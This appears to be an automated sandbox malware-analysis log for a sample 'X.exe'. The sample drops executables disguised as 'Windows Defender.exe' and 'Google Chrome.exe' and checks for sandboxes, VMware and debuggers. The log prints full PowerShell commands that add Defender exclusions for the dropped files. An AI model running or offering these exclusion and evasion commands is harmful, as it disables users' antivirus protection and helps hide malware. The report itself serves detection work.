                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                        Source: Windows Defender.exe, 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Windows Defender.exe.0.dr | Binary or memory string: SBIEDLL.DLL
                        Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Google Chrome.exe, 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Google Chrome.exe.0.dr | Binary or memory string: SBIEDLL.DLL!JNIMQCKOED45DYFT!IAM0ALKDJV0MYMDL!NOJWIPYBQPULQVZX!GTHCXSPLOYJGMMWS!U3KBXZGSFAQWGJLH!VTFJEYIGIKXYFUP8!GIGCCSAGVAK9C4YO!QIBI2FXSGTAAGMKI!MNHKSXYNHIQU6EPF!MDQRLNDNNYD8JUAU!WVCSNOTCYEFGUQPY!DILHNZWKHYCAURAI!Y8SFBAVEXAHTZUTJ!QGJ8CDBC5CGS6HBMINFO
                        Source: C:\Users\user\Desktop\X.exe | Memory allocated: 1360000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\X.exe | Memory allocated: 1C0F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: 6B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: 1A4B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: F20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: 1A9D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: 14E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Memory allocated: 1B150000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: 1A7B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: 1A810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: 2960000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Memory allocated: 1AAD0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\X.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5156
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4635
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7887
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1816
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6045
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1859
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6839
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1352
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7320
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2331
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8112
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1212
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7761
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1896
                        Source: C:\Users\user\Desktop\X.exe TID: 4048 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136 | Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848 | Thread sleep count: 7887 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040 | Thread sleep count: 1816 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 | Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788 | Thread sleep count: 6045 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792 | Thread sleep count: 1859 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4116 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe TID: 5456 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe TID: 3020 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584 | Thread sleep count: 7320 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732 | Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 | Thread sleep count: 2331 > 30
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe TID: 2144 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe TID: 5132 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912 | Thread sleep count: 8112 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912 | Thread sleep count: 1212 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 568 | Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008 | Thread sleep count: 7761 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016 | Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364 | Thread sleep count: 1896 > 30
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: Google Chrome.exe.0.drBinary or memory string: vmware
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess queried: DebugPort
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\X.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                        Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe"
                        Source: C:\Users\user\Desktop\X.exe | Process created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe"
                        Source: C:\Users\user\Desktop\X.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Users\user\Desktop\X.exe | Queries volume information: C:\Users\user\Desktop\X.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Google Chrome.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
